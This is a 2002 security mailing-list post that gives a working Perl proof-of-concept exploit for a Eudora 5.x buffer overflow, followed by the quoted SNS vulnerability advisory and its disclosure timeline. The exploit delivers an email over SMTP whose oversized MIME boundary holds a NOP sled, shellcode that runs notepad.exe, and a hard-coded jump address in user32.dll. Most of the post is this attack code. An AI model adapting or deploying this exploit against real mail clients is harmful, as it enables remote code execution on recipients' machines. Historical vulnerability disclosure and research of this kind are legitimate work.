OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Kanatoko (anvil_at_jumperz.net)
Date: Tue Aug 06 2002 - 01:49:24 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    This is a proof of concept exploit for Eudora 5.x buffer overflow.

    Tested on:
      Japanese Windows 2000 Professional SP2
      Eudora Version 5.0.2-Jr2

    #!/usr/local/bin/perl

    #---------------------------------------------------------------------
    # Eudora Version 5.0.2-Jr2 exploit for Japanese Windows 2000 Pro (SP2)
    # written by Kanatoko <anviljumperz.net>
    # http://www.jumperz.net/
    #---------------------------------------------------------------------

    use Socket;

    $connect_host = 'mail.jumperz.net';
    $port = 25;
    $env_from = 'anviljumperz.net';
    $env_to = 'targetjumperz.net';
    $from = 'anviljumperz.net';
    $to = 'targetjumperz.net';

    $iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
    $sock_addr = pack_sockaddr_in($port,$iaddr);
    socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
    connect(SOCKET,$sock_addr) || die "Connect Error\n";
    select(SOCKET); $|=1; select(STDOUT);

            #egg written by UNYUN (http://www.shadowpenguin.org/)
            #57bytes
    $egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
    $egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
    $egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
    $egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
    $egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
    $egg .= "notepad.exe";

    $buf = "\x90" x 121;
    $buf .= $egg;
    $buf .= "\xEB\xA0"; #JMP -0x60
    $buf .= "A" x 2;
    $buf .= "\x97\xAC\xE3\x77"; #0x77e3ac97 JMP EBX in user32.dll

    $hoge = <SOCKET>;
    print SOCKET "HELO hoge\x0D\x0A";
    $hoge = <SOCKET>;
    print SOCKET "MAIL FROM:<$env_from>\x0D\x0A";
    $hoge = <SOCKET>;
    print SOCKET "RCPT TO:<$env_to>\x0D\x0A";
    $hoge = <SOCKET>;
    print SOCKET "DATA\x0D\x0A";
    $hoge = <SOCKET>;

    print SOCKET << "_EOD_";
    MIME-Version: 1.0\x0D
    >From: $from\x0D
    To: $to\x0D
    Content-Type: multipart/mixed; boundary="$buf"\x0D
    \x0D
    .\x0D
    _EOD_
    $hoge = <SOCKET>;
    print SOCKET "QUIT\x0D\x0A";
    $hoge = <SOCKET>; 

    -- 
Kanatoko  <anviljumperz.net>
JUMPER : http://www.jumperz.net/(Japanese)

    On Mon, 05 Aug 2002 15:24:25 +0900
snsadvlac.co.jp wrote:

    > ----------------------------------------------------------------------
> SNS Advisory No.55
> Eudora 5.x for Windows Buffer Overflow Vulnerability
> 
> Problem first discovered: 6 Jun 2002
> Published: 5 Aug 2002
> ----------------------------------------------------------------------
> 
> Overview:
> ---------
>   Eudora 5.x for Windows contains a buffer overflow vulnerability, 
>   which could allow a remote attacker to execute arbitrary code.
> 
> Problem Description:
> --------------------
>   Eudora developed and distributed by QUALCOMM Inc. 
>   (http://www.qualcomm.com/), is a Mail User Agent running on Windows 
>   95/98/2000/ME/NT 4.0 and MacOS 8.1 or later.
> 
>   The buffer overflow occurs when Eudora receives a message using a long
>   string as a boundary, which is used to divide a multi-part message into
>   separate parts.  In our verification environment, we have found that 
>   this could allow arbitrary commands to be executed. 
> 
> Tested Version:
> ---------------
>   Eudora 5.0-J for Windows (Ver.5.0.2-Jr2 trial) [Japanese]
>   Eudora 5.1.1 for Windows (Sponsored Mode) [English]
> 
> Tested OS:
> ----------
>   Microsoft Windows 2000 Professional SP2 [Japanese]
>   Microsoft Windows 98 SE [Japanese]
> 
> Solution:
> ---------
>   The problem will be fixed in the next release of Eudora.
>   The vendor has not reported when the next release will be available.
> 
> Communication background:
> -------------------------
>  6 Jun 2002  : We discovered the vulnerability.
>  6 Jun 2002  : We reported the findings to Livin' on the EDGE Co., Ltd. 
>                (user support of Japanese version) .
>  14 Jun 2002 : the findings were reported again to Livin' on the EDGE Co.,
>                Ltd. .
>  17 Jun 2002 : We contacted QUALCOMM Inc. .
>  18 Jun 2002 : QUALCOMM Inc. sent a reply stating that they had started an
>                investigation of the problem.
>  3 Jul 2002  : We asked QUALCOMM Inc. about the progress of the
>                investigation
>  19 Jul 2002 : We asked QUALCOMM Inc. again about the progress of the
>                investigation
>  24 Jul 2002 : We informed QUALCOMM Inc. about the announcement schedule
>                of this advisory
>  25 Jul 2002 : QUALCOMM Inc. reported that this problem will be fixed in
>                the next release
>  5 Aug 2002  : We decided to disclose this vulnerability due to concern
>                over the potential consequences this issue may cause.
>                Livin' on the EDGE Co., Ltd. has not provided any comments
>                on this issue as of August 5, 2002.
> 
> Discovered by:
> --------------
>   Nobuo Miwa (LAC / n-miwalac.co.jp)
> 
> Disclaimer:
> -----------
>   All information in these advisories are subject to change without any 
>   advanced notices neither mutual consensus, and each of them is released 
>   as it is. LAC Co.,Ltd. is not responsible for any risks of occurrences 
>   caused by applying those information.
> 
> ------------------------------------------------------------------
> SecureNet Service(SNS) Security Advisory <snsadvlac.co.jp>
> Computer Security Laboratory, LAC  http://www.lac.co.jp/security/
> 
>